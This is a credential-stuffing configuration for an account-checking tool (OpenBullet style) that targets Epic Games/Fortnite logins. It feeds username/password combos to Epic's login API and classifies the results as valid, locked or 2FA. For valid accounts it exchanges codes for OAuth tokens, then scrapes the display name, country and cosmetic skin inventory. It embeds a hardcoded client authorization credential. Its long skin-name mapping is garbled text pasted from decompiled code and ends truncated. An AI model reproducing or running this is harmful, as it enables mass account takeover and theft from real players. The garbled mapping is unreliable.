[SETTINGS]
{
  "Name": "Fortnite",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-11-02T16:08:15.4401866+01:00",
  "AdditionalInfo": "",
  "Author": "Seliax#2983",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.epicgames.com/id/api/csrf" 
  
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: basic MzQ0NmNkNzI2OTRjNGE0NDg1ZDgxYjc3YWRiYjIxNDE6OTIwOWQ0YTVlMjVhNDU3ZmI5YjA3NDg5ZDMxM2I0MWE=" 

PARSE "<COOKIES(XSRF-TOKEN)>" LR "" "" -> VAR "CSRF" 

REQUEST POST "https://www.epicgames.com/id/api/login" 
  CONTENT "email=<USER>&password=<PASS>&rememberMe=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "XSRF-TOKEN: <CSRF>" 
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-xsrf-token: <CSRF>" 
  HEADER "Authorization: basic MzQ0NmNkNzI2OTRjNGE0NDg1ZDgxYjc3YWRiYjIxNDE6OTIwOWQ0YTVlMjVhNDU3ZmI5YjA3NDg5ZDMxM2I0MWE=" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry the credentials you are using are invalid" 
    KEY "Real ID association is required" 
    KEY "Please reset your password to proceed with login" 
    KEY "email is invalid" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "account has been locked because of too many invalid login attempts" 
    KEY "Sorry the account you are using is not active" 
    KEY "wo-Factor authentication required to process" 
  KEYCHAIN Success OR 
    KEY "<HEADERS{*}>" Contains "Transfer-Encoding" 

REQUEST GET "https://www.epicgames.com/id/api/exchange" 
  
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "You are not authenticated. Please authenticate." 
    KEY "email is invalid" 
  KEYCHAIN Success OR 
    KEY "{\"code\":\"" 

PARSE "<SOURCE>" LR "{\"code\":\"" "\"" -> VAR "CD" 

REQUEST POST "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token" 
  CONTENT "grant_type=exchange_code&exchange_code=<CD>&includePerms=true&token_type=eg1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: basic MzQ0NmNkNzI2OTRjNGE0NDg1ZDgxYjc3YWRiYjIxNDE6OTIwOWQ0YTVlMjVhNDU3ZmI5YjA3NDg5ZDMxM2I0MWE=" 

PARSE "<SOURCE>" LR "\"access_token\" : \"" "\"," -> VAR "AC" 

PARSE "<SOURCE>" LR "\"account_id\" : \"" "\"," -> VAR "ID" 

REQUEST GET "https://account-public-service-prod03.ol.epicgames.com/account/api/public/account/<ID>" 
  
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: bearer <AC>" 

PARSE "<SOURCE>" LR "displayName\" : \"" "\"" -> CAP "DisplayN" 

PARSE "<SOURCE>" LR "failedLoginAttempts\" : " "," -> CAP "FailedLogA" 

PARSE "<SOURCE>" LR "country\" : \"" "\"" -> CAP "Country" 

PARSE "<SOURCE>" LR "canUpdateDisplayName\" : " "," -> CAP "CanUpdateDN?" 

REQUEST POST "https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/<ID>/client/QueryProfile?profileId=athena&rvn=-1" 
  CONTENT "{}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Fortnite/++Fortnite+Release-4.5-CL-4166199 Windows/6.2.9200.1.768.64bit" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: fortnite-public-service-prod11.ol.epicgames.com" 
  HEADER "Authorization: bearer <AC>" 
  HEADER "X-EpicGames-McpVersion: prod-live Release-9.40-9.40 build 318 cl 7461195" 
  HEADER "X-EpicGames-Profile-Revision: 11128" 

PARSE "<SOURCE>" LR "\":\"AthenaCharacter:" "\",\"" Recursive=TRUE -> VAR "SkinCount" 

FUNCTION CountOccurrences "cid_" "<SkinCount>" -> CAP "SkinCount" 

PARSE "<SOURCE>" LR "\":\"AthenaCharacter:" "\",\"" Recursive=TRUE -> VAR "Skin" 

FUNCTION Constant "<Skin>" -> VAR "Duh" 

FUNCTION Translate 
  KEY "cid_015_athena_commando_f" VALUE "AssaultTrooper cid_016_athena_commando_f: Commando cid_017_athena_commando_m: AerialAssaultTrooper cid_018_athena_commando_m: ReconScout cid_019_athena_commando_m: Infiltrator cid_020_athena_commando_m: SpecialForces cid_021_athena_commando_f: Brawler cid_022_athena_commando_f: ReconExpert cid_023_athena_commando_f: MunitionsExpert cid_024_athena_commando_f: ReconSpecialist cid_025_athena_commando_m: FirststrikeSpecialist cid_026_athena_commando_m: Desperado cid_027_athena_commando_f: SurvivalSpecialist cid_028_athena_commando_f: RenegadeRaider cid_029_athena_commando_f_halloween: GhoulTrooper cid_030_athena_commando_m_halloween: SkullTrooper cid_031_athena_commando_m_retro: Raptor cid_032_athena_commando_m_medieval: BlueSquire cid_033_athena_commando_f_medieval: RoyaleKnight cid_034_athena_commando_f_medieval: RedKnight cid_035_athena_commando_m_medieval: BlackKnight cid_036_athena_commando_m_wintercamo: AbsoluteZero cid_037_athena_commando_f_wintercamo: ArcticAssassin cid_038_athena_commando_m_disco: FunkOps cid_039_athena_commando_f_disco: SparkleSpecialist cid_040_athena_commando_m_district: Devastator cid_041_athena_commando_f_district: Dominator cid_042_athena_commando_m_cyberpunk: CircuitBreaker cid_043_athena_commando_f_stealth: ShadowOps cid_044_athena_commando_f_scipop: BriteBomber cid_045_athena_commando_m_holidaysweater: YuletideRanger cid_046_athena_commando_f_holidaysweater: NogOps cid_047_athena_commando_f_holidayreindeer: Red-NosedRaider cid_048_athena_commando_f_holidaygingerbread: GingerGunner cid_049_athena_commando_m_holidaygingerbread: MerryMarauder cid_050_athena_commando_m_holidaynutcracker: Crackshot cid_051_athena_commando_m_holidayelf: CodenameE.L.F. cid_052_athena_commando_f_psblue: BlueTeamLeader cid_053_athena_commando_m_skidude: AlpineAce cid_054_athena_commando_m_skidude_usa: AlpineAce(USA) cid_055_athena_commando_m_skidude_can: AlpineAce(CAN) cid_056_athena_commando_m_skidude_gbr: AlpineAce(GBR) cid_057_athena_commando_m_skidude_fra: AlpineAce(FRA) cid_058_athena_commando_m_skidude_ger: AlpineAce(GER) cid_059_athena_commando_m_skidude_chn: AlpineAce(CHN) cid_060_athena_commando_m_skidude_kor: AlpineAce(KOR) cid_061_athena_commando_f_skigirl: MogulMaster cid_062_athena_commando_f_skigirl_usa: MogulMaster(USA) cid_063_athena_commando_f_skigirl_can: MogulMaster(CAN) cid_064_athena_commando_f_skigirl_gbr: MogulMaster(GBR) cid_065_athena_commando_f_skigirl_fra: MogulMaster(FRA) cid_066_athena_commando_f_skigirl_ger: MogulMaster(GER) cid_067_athena_commando_f_skigirl_chn: MogulMaster(CHN) cid_068_athena_commando_f_skigirl_kor: MogulMaster(KOR) cid_069_athena_commando_f_pinkbear: CuddleTeamLeader cid_070_athena_commando_m_cupid: LoveRanger cid_071_athena_commando_m_wukong: Wukong cid_072_athena_commando_m_scout: SashSergeant cid_073_athena_commando_f_scuba: SnorkelOps cid_074_athena_commando_f_stripe: JungleScout cid_075_athena_commando_f_stripe: TacticsOfficer cid_076_athena_commando_f_sup: Dazzle cid_077_athena_commando_m_sup: Hyperion cid_078_athena_commando_m_camo: HighriseAssaultTrooper cid_079_athena_commando_f_camo: TowerReconSpecialist cid_080_athena_commando_m_space: MissionSpecialist cid_081_athena_commando_f_space: Moonwalker cid_082_athena_commando_m_scavenger: RustLord cid_083_athena_commando_f_tactical: EliteAgent cid_084_athena_commando_m_assassin: TheReaper cid_085_athena_commando_m_twitch: SubCommander cid_086_athena_commando_m_redsilk: CrimsonScout cid_087_athena_commando_f_redsilk: ScarletDefender cid_088_athena_commando_m_spaceblack: DarkVoyager cid_089_athena_commando_m_retrogrey: Havoc cid_090_athena_commando_m_tactical: RogueAgent cid_091_athena_commando_m_redshirt: RadiantStriker cid_092_athena_commando_f_redshirt: BrilliantStriker cid_093_athena_commando_m_dinosaur: Rex cid_094_athena_commando_m_rider: Burnout cid_095_athena_commando_m_founder: Warpaint cid_096_athena_commando_f_founder: RoseTeamLeader cid_097_athena_commando_f_rockerpunk: PowerChord cid_098_athena_commando_f_stpatty: Sgt.GreenClover cid_099_athena_commando_f_scathach: HighlandWarrior cid_100_athena_commando_m_cuchulainn: BattleHound cid_101_athena_commando_m_stealth: MidnightOps cid_102_athena_commando_m_raven: Raven cid_103_athena_commando_m_bunny: RabbitRaider cid_104_athena_commando_f_bunny: BunnyBrawler cid_105_athena_commando_f_spaceblack: DarkVanguard cid_106_athena_commando_f_taxi: Whiplash cid_107_athena_commando_f_pajamaparty: TriceraOps cid_108_athena_commando_m_fishhead: Leviathan cid_109_athena_commando_m_pizza: Tomatohead cid_110_athena_commando_f_circuitbreaker: Cipher cid_111_athena_commando_f_robo: Steelsight cid_112_athena_commando_m_brite: BriteGunner cid_113_athena_commando_m_blueace: RoyaleBomber cid_114_athena_commando_f_tacticalwoodland: Trailblazer cid_115_athena_commando_m_carbideblue: Carbide cid_116_athena_commando_m_carbideblack: Omega cid_117_athena_commando_m_tacticaljungle: SquadLeader cid_118_athena_commando_f_valor: Valor cid_119_athena_commando_f_candy: Zoey cid_120_athena_commando_f_graffiti: Teknique cid_121_athena_commando_m_graffiti: Abstrakt cid_122_athena_commando_m_metal: Diecast cid_123_athena_commando_f_metal: Chromium cid_124_athena_commando_f_auroraglow: Nitelite cid_125_athena_commando_m_tacticalwoodland: Battlehawk cid_126_athena_commando_m_auroraglow: Liteshow cid_127_athena_commando_m_hazmat: ToxicTrooper cid_128_athena_commando_f_hazmat: HazardAgent cid_129_athena_commando_m_deco_retouch: Venturion cid_130_athena_commando_m_merman: MoistyMerman cid_131_athena_commando_m_warpaint: Bandolier cid_132_athena_commando_m_venus: Flytrap cid_133_athena_commando_f_deco: Ventura cid_134_athena_commando_m_jailbird: Scoundrel cid_135_athena_commando_f_jailbird: Rapscallion cid_136_athena_commando_m_basketball: Jumpshot cid_137_athena_commando_f_basketball: TripleThreat cid_138_athena_commando_m_psburnout: BlueStriker cid_139_athena_commando_m_fighterpilot: Wingman cid_140_athena_commando_m_visitor: TheVisitor cid_141_athena_commando_m_darkeagle: Omen cid_142_athena_commando_m_wwiipilot: SkyStalker cid_143_athena_commando_f_darkninja: Fate cid_144_athena_commando_m_soccerdudea: SuperStriker cid_145_athena_commando_m_soccerdudeb: MidfieldMaestro cid_146_athena_commando_m_soccerdudec: AerialThreat cid_147_athena_commando_m_soccerduded: StalwartSweeper cid_148_athena_commando_f_soccergirla: DynamicDribbler cid_149_athena_commando_f_soccergirlb: PoisedPlaymaker cid_150_athena_commando_f_soccergirlc: ClinicalCrosser cid_151_athena_commando_f_soccergirld: FinesseFinisher cid_152_athena_commando_f_carbideorange: Criterion cid_153_athena_commando_f_carbideblack: Oblivion cid_154_athena_commando_m_gumshoe: Sleuth cid_155_athena_commando_f_gumshoe: Gumshoe cid_156_athena_commando_f_fuzzybearind: FireworksTeamLeader cid_157_athena_commando_m_starsandstripes: Star-SpangledTrooper cid_158_athena_commando_f_starsandstripes: Star-SpangledRanger cid_159_athena_commando_m_gumshoedark: Noir cid_160_athena_commando_m_speedyred: Vertex cid_161_athena_commando_m_drift: Drift cid_162_athena_commando_f_streetracer: Redline cid_163_athena_commando_f_viking: Huntress cid_164_athena_commando_m_viking: Magnus cid_165_athena_commando_m_darkviking: Ragnarok cid_166_athena_commando_f_lifeguard: SunStrider cid_167_athena_commando_m_tacticalbadass: Sledgehammer cid_168_athena_commando_m_shark: ChompSr. cid_169_athena_commando_m_luchador: MaskedFury cid_170_athena_commando_f_luchador: Dynamo cid_171_athena_commando_m_sharpdresser: Moniker cid_172_athena_commando_f_sharpdresser: Fortune cid_173_athena_commando_f_starfishuniform: Rook cid_174_athena_commando_f_carbidewhite: Eon cid_175_athena_commando_m_celestial: Galaxy cid_176_athena_commando_m_lifeguard: SunTanSpecialist cid_177_athena_commando_m_streetracercobra: Maverick cid_178_athena_commando_f_streetracercobra: Shade cid_179_athena_commando_f_scuba: ReefRanger cid_180_athena_commando_m_scuba: WreckRaider cid_182_athena_commando_m_modernmilitary: Archetype cid_183_athena_commando_m_modernmilitaryred: DoubleHelix cid_185_athena_commando_m_durrburgerhero: BeefBoss cid_186_athena_commando_m_exercise: MulletMarauder cid_187_athena_commando_f_fuzzybearpanda: P.A.N.D.ATeamLeader cid_188_athena_commando_f_streetracerwhite: Whiteout cid_189_athena_commando_f_exercise: AerobicAssassin cid_190_athena_commando_m_streetracerwhite: Overtaker cid_191_athena_commando_m_sushichef: SushiMaster cid_192_athena_commando_m_hippie: FarOutMan cid_193_athena_commando_f_hippie: Dreamflower cid_194_athena_commando_f_ravenquill: Ravage cid_195_athena_commando_f_bling: TheAce cid_196_athena_commando_m_biker: Backbone cid_197_athena_commando_f_biker: Chopper cid_198_athena_commando_m_bluesamurai: Musha cid_199_athena_commando_f_bluesamurai: Hime cid_200_athena_commando_m_darkpaintballer: Enforcer cid_201_athena_commando_m_desertops: Armadillo cid_202_athena_commando_f_desertops: Scorpion cid_203_athena_commando_m_cloakedstar: CloakedStar cid_204_athena_commando_m_garageband: StageSlayer cid_205_athena_commando_f_garageband: SynthStar cid_206_athena_commando_m_bling: WildCard cid_207_athena_commando_m_footballdudea: EndZone cid_208_athena_commando_m_footballdudeb: Gridiron cid_209_athena_commando_m_footballdudec: Spike cid_210_athena_commando_f_footballgirla: Blitz cid_211_athena_commando_f_footballgirlb: Rush cid_212_athena_commando_f_footballgirlc: Interceptor cid_214_athena_commando_f_footballreferee: WhistleWarrior cid_215_athena_commando_m_footballreferee: StripedSoldier cid_216_athena_commando_f_medic: FieldSurgeon cid_217_athena_commando_m_medic: TriageTrooper cid_218_athena_commando_m_greenberet: Garrison cid_219_athena_commando_m_hacivat: Hacivat cid_220_athena_commando_f_clown: Peekaboo cid_221_athena_commando_m_clown: NiteNite cid_222_athena_commando_f_darkviking: Valkyrie cid_223_athena_commando_m_dieselpunk: Maximillian cid_224_athena_commando_f_dieselpunk: Airheart cid_225_athena_commando_m_octoberfest: Ludwig cid_226_athena_commando_f_octoberfest: Heidi cid_227_athena_commando_f_vampire: Dusk cid_228_athena_commando_m_vampire: Sanctum cid_229_athena_commando_f_darkbomber: DarkBomber cid_230_athena_commando_m_werewolf: Dire cid_231_athena_commando_f_redriding: Fable cid_232_athena_commando_f_halloweentomato: Nightshade cid_233_athena_commando_m_fortnitedj: DJYonder cid_234_athena_commando_m_llamarider: Giddy-up cid_235_athena_commando_m_scarecrow: HayMan cid_236_athena_commando_f_scarecrow: StrawOps cid_237_athena_commando_f_cowgirl: Calamity cid_238_athena_commando_f_footballgirld: Juke cid_239_athena_commando_m_footballduded: StrongGuard cid_240_athena_commando_f_plague: Scourge cid_241_athena_commando_m_plague: Plague cid_242_athena_commando_f_bullseye: Bullseye cid_243_athena_commando_m_pumpkinslice: Hallowhead cid_244_athena_commando_m_pumpkinsuit: JackGourdon cid_245_athena_commando_f_durrburgerpjs: Onesie cid_246_athena_commando_f_grave: SkullRanger cid_247_athena_commando_m_guanyu: GuanYu cid_248_athena_commando_m_blackwidow: SpiderKnight cid_249_athena_commando_f_blackwidow: Arachne cid_250_athena_commando_m_evilcowboy: Deadfire cid_251_athena_commando_f_muertos: Rosa cid_252_athena_commando_m_muertos: Dante cid_253_athena_commando_m_militaryfashion2: SummitStriker cid_254_athena_commando_m_zombie: Brainiac cid_256_athena_commando_m_pumpkin: PatchPatroller cid_257_athena_commando_m_samuraiultra: Shogun cid_258_athena_commando_f_fuzzybearhalloween: SpookyTeamLeader cid_259_athena_commando_m_streetops: Reflex cid_260_athena_commando_f_streetops: Instinct cid_261_athena_commando_m_raptorarcticcamo: Frostbite cid_262_athena_commando_m_madcommander: Ruckus cid_263_athena_commando_f_madcommander: Mayhem cid_264_athena_commando_m_animaljackets: Growler cid_265_athena_commando_f_animaljackets: Flapjackie cid_266_athena_commando_f_llamarider: Yee-Haw! cid_267_athena_commando_m_robotred: A.I.M cid_268_athena_commando_m_rockerpunk: Riot cid_269_athena_commando_m_wizard: Castor cid_270_athena_commando_f_witch: Elmira cid_271_athena_commando_f_sushichef: MakiMaster cid_272_athena_commando_m_hornedmask: Taro cid_273_athena_commando_f_hornedmask: Nara cid_274_athena_commando_m_feathers: TenderDefender cid_275_athena_commando_m_sniperhood: Longshot cid_276_athena_commando_f_sniperhood: Insight cid_277_athena_commando_m_moth: Mothmando cid_278_athena_commando_m_yeti: Trog cid_279_athena_commando_m_tacticalsanta: Sgt.Winter cid_280_athena_commando_m_snowman: SlushySoldier cid_281_athena_commando_f_snowboard: Powder cid_286_athena_commando_f_neoncat: Lynx cid_287_athena_commando_m_arcticsniper: Zenith cid_288_athena_commando_m_iceking: TheIceKing cid_290_athena_commando_f_bluebadass: Waypoint cid_291_athena_commando_m_dieselpunk02: Cloudbreaker cid_292_athena_commando_f_dieselpunk02: Wingtip cid_293_athena_commando_m_ravenwinter: FrozenRaven cid_294_athena_commando_f_redknightwinter: FrozenRedKnight cid_295_athena_commando_m_cupidwinter: FrozenLoveRanger cid_296_athena_commando_m_math: Prodigy cid_297_athena_commando_f_math: Maven cid_298_athena_commando_f_icemaiden: Glimmer cid_299_athena_commando_m_snowninja: Snowfoot cid_300_athena_commando_f_angel: Ark cid_302_athena_commando_f_nutcracker: Crackabella cid_303_athena_commando_f_snowfairy: Sugarplum cid_304_athena_commando_m_gnome: Grimbles cid_308_athena_commando_f_fortnitedj: DJBop cid_309_athena_commando_m_streetgoth: Paradox cid_310_athena_commando_f_streetgoth: Lace cid_311_athena_commando_m_reindeer: Red-nosedRanger cid_312_athena_commando_f_funkops: DiscoDiva cid_314_athena_commando_m_krampus: Krampus cid_315_athena_commando_m_teriyakifish: Fishstick cid_316_athena_commando_f_winterholiday: Tinseltoes cid_317_athena_commando_m_winterghoul: CloakedShadow cid_318_athena_commando_m_demon: Malcore cid_321_athena_commando_m_militaryfashion1: Verge cid_322_athena_commando_m_techops: TechOps cid_323_athena_commando_m_barbarian: Jaeger cid_324_athena_commando_f_barbarian: Fyra cid_327_athena_commando_m_bluemystery: Cobalt cid_331_athena_commando_m_taxi: Cabbie cid_336_athena_commando_m_dragonmask: Firewalker cid_339_athena_commando_m_robottrouble: Revolt cid_340_athena_commando_f_robottrouble: Rebel cid_341_athena_commando_f_skullbrite: Skully cid_342_athena_commando_m_streetracermetallic: HonorGuard cid_343_athena_commando_m_cupiddark: FallenLoveRanger cid_344_athena_commando_m_icecream: LilWhip cid_313_athena_commando_m_kpopfashion: IKONIK cid_325_athena_commando_m_wavyman: Bendie cid_326_athena_commando_f_wavyman: Twistie cid_346_athena_commando_m_dragonninja: Hybrid cid_347_athena_commando_m_pirateprogressive: Blackheart cid_348_athena_commando_f_medusa: Sidewinder cid_349_athena_commando_m_banana: Peely cid_350_athena_commando_m_masterkey: MasterKey cid_351_athena_commando_f_fireelf: Ember cid_352_athena_commando_f_shiny: Luxe cid_353_athena_commando_f_bandolier: Bandolette cid_354_athena_commando_m_munitionsexpert: MunitionsMajor cid_355_athena_commando_m_farmer: Hayseed cid_356_athena_commando_f_farmer: Sunflower cid_357_athena_commando_m_orangecamo: Hypernova cid_358_athena_commando_m_aztec: Mezmer cid_359_athena_commando_f_aztec: Sunbird cid_360_athena_commando_m_techopsblue: CarbonCommando cid_361_athena_commando_m_bandageninja: Kenji cid_362_athena_commando_f_bandageninja: Kuno cid_363_athena_commando_m_sciops: Axiom cid_364_athena_commando_f_sciops: Psion cid_366_athena_commando_m_tropical: Marino cid_367_athena_commando_f_tropical: Laguna cid_369_athena_commando_f_devilrock: Malice cid_370_athena_commando_m_evilsuit: Inferno cid_372_athena_commando_f_pirate01: Buccanee cid_373_athena_commando_m_pirate01: SeaWolf cid_376_athena_commando_m_darkshama: Shaman cid_377_athena_commando_f_darkshaman: Nightwitch cid_378_athena_commando_m_furnaceface: Ruin cid_379_athena_commando_m_battlehoundfire: MoltenBattleHound cid_380_athena_commando_f_darkviking_fire: MoltenValkyrie cid_386_athena_commando_m_streetopsstealth: StealthReflex cid_388_athena_commando_m_thebomb: Splode cid_389_athena_commando_f_spacebunny: Gemini cid_393_athena_commando_m_shiny: Sterling cid_394_athena_commando_m_moonlightassassin: Luminos cid_395_athena_commando_f_shatterfly: Dream cid_396_athena_commando_f_swashbuckler: DaringDuelist cid_397_athena_commando_f_treasurehunterfashion: Aura cid_398_athena_commando_m_treasurehunterfashion: Guild cid_399_athena_commando_f_ashtonboardwalk: BlackWidowOutfit cid_400_athena_commando_m_ashtonsaltlake: Star-LordOutfit cid_401_athena_commando_m_miner: Cole cid_403_athena_commando_m_rooster: Sentinel cid_404_athena_commando_f_bountyhunter: Vega cid_405_athena_commando_f_masako: Demi cid_406_athena_commando_m_stormtracker: Stratus cid_407_athena_commando_m_battlesuit: Vendetta cid_408_athena_commando_f_strawberrypilot: Rox cid_409_athena_commando_m_bunkerman: BunkerJonesy cid_410_athena_commando_m_cyberscavenger: Ether cid_411_athena_commando_f_cyberscavenger: Versa cid_412_athena_commando_f_raptor: Velocity cid_413_athena_commando_m_streetdemon: Cryptic cid_414_athena_commando_f_militaryfashion: Bracer cid_416_athena_commando_m_assassinsuit: JohnWick cid_418_athena_commando_f_geisha: Takara cid_420_athena_commando_f_whitetiger: Wilde cid_423_athena_commando_f_painter: Clutch cid_424_athena_commando_m_vigilante: Grind cid_426_athena_commando_f_demonhunter: Callisto cid_427_athena_commando_m_demonhunter: Asmodeus cid_428_athena_commando_m_urbanscavenger: ShotCaller cid_429_athena_commando_f_neonlines: Breakpoint cid_431_athena_commando_f_stormpilot: Bolt cid_432_athena_commando_m_balloonhead: Airhead cid_433_athena_commando_f_tacticaldesert: DesertDominator cid_434_athena_commando_f_stealthhonor: Wonder cid_435_athena_commando_m_munitionsexpertgreenplastic: PlasticPatroller cid_436_athena_commando_m_reconspecialist: Relay cid_440_athena_commando_f_bullseyegreenplastic: ToyTrooper cid_441_athena_commando_f_cyberscavengerblue: NeoVersa } }; //Token: 0x04000008RID: 8 publicstaticHashtableBackblings=newHashtable { bid_001_bluesquire: SquireShield bid_002_royaleknight: RoyaleShield bid_003_redknight: RedShield bid_004_blackknight: BlackShield bid_005_raptor: RaptorSatchel bid_006_skidude: AlpineAccessories bid_007_skidude_usa: AlpineAccessories(USA) bid_008_skidude_can: AlpineAccessories(CAN) bid_009_skidude_gbr: AlpineAccessories(GBR) bid_010_skidude_fra: AlpineAccessories(FRA) bid_011_skidude_ger: AlpineAccessories(GER) bid_012_skidude_chn: AlpineAccessories(CHN) bid_013_skidude_kor: AlpineAccessories(KOR) bid_014_skigirl: MogulSkiBag bid_015_skigirl_usa: MogulSkiBag(USA) bid_016_skigirl_can: MogulSkiBag(CAN) bid_017_skigirl_gbr: MogulSkiBag(GBR) bid_018_skigirl_fra: MogulSkiBag(FRA) bid_019_skigirl_ger: MogulSkiBag(GER) bid_021_skigirl_kor: MogulSkiBag(KOR) bid_022_cupid: LoveWings bid_023_pinkbear: CuddleBow bid_024_space: Astro bid_025_tactical: Precision bid_026_brite: BriteBag bid_027_scavenger: RustBucket bid_028_spaceblack: DarkMatter bid_029_retrogrey: BackupPlan bid_030_tacticalrogue: Catalyst bid_031_dinosaur: Scaly bid_032_foundermale: Pursuit bid_033_founderfemale: Skirmish bid_034_rockerpunk: SixString bid_035_scathach: Buckler bid_036_raven: IronCage bid_037_bunnymale: HardBoiled bid_038_bunnyfemale: Eggshell bid_039_spaceblackfemale: DarkVoid bid_040_wukong: RoyaleFlags bid_041_pajamaparty: Hatchling bid_042_fishhead: FishTank bid_043_pizza: SpecialDelivery bid_044_robo: Steelcast bid_045_tacticaljungle: StandardIssue bid_047_candy: GoodieBag bid_048_graffiti: TagBag bid_049_tacticalwoodland: TrueNorth bid_050_hazmat: Pathogen bid_051_merman: Mertank bid_052_hazmatfemale: Contagion bid_053_jailbirdmale: Strongbox bid_054_jailbirdfemale: BurgleBag bid_055_psburnout: BlueShift bid_056_fighterpilot: BogeyBag bid_057_visitor: OffworldRig bid_058_darkeagle: BattleShroud bid_059_wwiipilot: LastGasp bid_060_darkninja: OminousOrb bid_061_carbideorange: Stabilizer bid_062_gumshoe: EvidenceBag bid_063_cuchulainn: CrestedCape bid_064_fuzzybearind: BlastingCap bid_065_carbideblack: Destabilizer bid_066_speedyred: Deflector bid_067_gumshoefemale: ConfidentialCase bid_068_gumshoedark: Cluefinder bid_069_decomale: VenturionCape bid_070_decofemale: VenturaCape bid_071_vikingfemale: Rearguard bid_072_vikingmale: EnduringCape bid_073_darkviking: FrozenShroud bid_074_lifeguardfemale: PoolParty bid_075_tacticalbadass: Uplink bid_076_shark: SharkFin bid_077_wegame: Insignia bid_078_streetracercobrafemale: Ballistic bid_079_penguin: Penguin bid_080_streetracercobramale: BatAttitude bid_081_scubamale: DivingTank bid_082_scubafemale: AirTank bid_083_lifeguardmale: RescueRing bid_084_birthday2018: BirthdayCake bid_085_modernmilitary: Paradigm bid_086_exercisefemale: BackPlate bid_087_exercisemale: Boombox bid_088_sushichefmale: Chef'sChoice bid_089_streetracerwhitefemale: Ignition bid_090_streetracerwhitemale: LaneSplitter bid_091_durrrburgerhero: DeepFried bid_092_fuzzybearpanda: Bamboo bid_093_hippiemale: SummerStrummer bid_094_hippiefemale: HipShakers bid_095_ravenquillfemale: DarkWings bid_096_bikermale: RoadReady bid_097_bikerfemale: RoadFlair bid_098_bluesamuraimale: Sashimono bid_099_bluesamuraifemale: Shiro bid_100_darkpaintballer: Subjugator bid_101_blingfemale: SwagBag bid_102_buckles: Slashed bid_103_clawed: Buckled bid_104_yellowzip: Vintage bid_105_ghostportal: GhostPortal bid_106_garagebandmale: KickDrum bid_107_garagebandfemale: Keytar bid_108_blingmale: CuffCase bid_108_hacivatmale: CraftedCarrier bid_109_medicmale: CarePackage bid_110_medicfemale: GurneyGear bid_111_clownfemale: BattleBalloon bid_112_clownmale: BalloonLlama bid_113_darkvikingfemale: ValkyrieWings bid_114_modernmilitaryred: Telemetry bid_116_dieselpunkfemale: Airflow bid_117_octoberfestmale: Clockworks bid_118_octoberfestfemale: PretzelProtector bid_119_vampirefemale: DuskWings bid_120_werewolf: Wolfpack bid_121_redriding: FabledCape bid_122_calloweentomato: NightCloak bid_123_fortnitedj: Waveform bid_126_darkbomber: DarkBag bid_127_plaguemale: DismalCape bid_128_plaguefemale: Arcanum bid_129_pumpkinslice: MoulderingCloak bid_130_vampiremale02: CovenCape bid_131_blackwidowfemale: LongLegs bid_132_blackwidowmale: SpiderShield bid_133_guanyu: LoyalShield bid_134_militaryfashion: TopNotch bid_135_muertosfemale: Calavera bid_136_muertosmale: SpiritCape bid_137_evilcowboy: ShackledStone bid_138_celestial: GalacticDisc bid_139_fuzzybearcalloween: GoodieGourd bid_140_streetopsmale: ResponseUnit bid_141_streetopsfemale: ReactionTank bid_142_samuraiultra: BladedWings bid_143_madcommandermale: SpikeChamber bid_144_madcommanderfemale: PuncturePack bid_145_animaljacketsmale: Woofs bid_146_animaljacketsfemale: Nibbles bid_147_lilkev: Lil'Kev bid_148_robotred: E.L.I.M. bid_149_wizard: Spellbinder bid_150_witch: TomePouch bid_151_sushicheffemale: Shrimpy bid_152_cornedmaskmale: TrustyTusks bid_153_cornedmaskfemale: WhiteFang bid_154_feathers: Hatchback bid_155_snipercoodmale: ScopeSatchel bid_156_snipercoodfemale: SightSling bid_157_mothmale: Wingback bid_158_arcticsnipermale: Altitude bid_160_tacticalsantamale: PerfectPresent bid_161_snowboardfemale: TrailTote bid_162_yetimale: IceCube bid_163_iceking: IceMantle bid_164_snowmanmale: SlushyJr. bid_165_bluebadassfemale: SignalHub bid_166_ravenwintermale: FrozenIronCage bid_167_redknightwinterfemale: FrozenRedShield bid_168_cupidwintermale: FrozenLoveWings bid_169_mathmale: Tabulator 